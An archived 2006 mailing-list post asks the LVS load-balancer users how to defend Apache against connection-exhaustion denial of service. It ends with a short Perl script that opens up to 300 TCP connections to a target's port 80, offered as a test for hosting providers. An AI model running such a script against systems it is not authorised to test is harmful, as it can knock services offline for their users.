DoS protection strategies

To: lvs-users@xxxxxxxxxxxxxxxxxxxxxx
Subject: DoS protection strategies
From: "Willem de Groot" <willem@xxxxxxx>
Date: Tue, 18 Apr 2006 17:53:43 +0200
Hi,

To my surprise, opening 150 tcp connections to a default apache
installation is enough to effectively DoS it for a few minutes (until
connections time out). This could be circumvented by using
mod_throttle, mod_bwshare or mod_limitipconn but imho a much better
place to solve this is at the LVS loadbalancer. Which already does
source IP tracking for the "persistency" feature.

Did anyone implement such a feature? Considerations?

A sample script to test your webhosting provider:

#!/usr/bin/perl
my $target = shift or die "Usage: $0 <target>\n";
use IO::Socket::INET;
for my $t (0..300) {
  print "Try $t... ";
  $cons[$t] = IO::Socket::INET->new( PeerAddr => "$target:80", Proto
=> 'tcp', Blocking => 1 )
  or die "Couldn't connect!";
        print "connected!\n";
}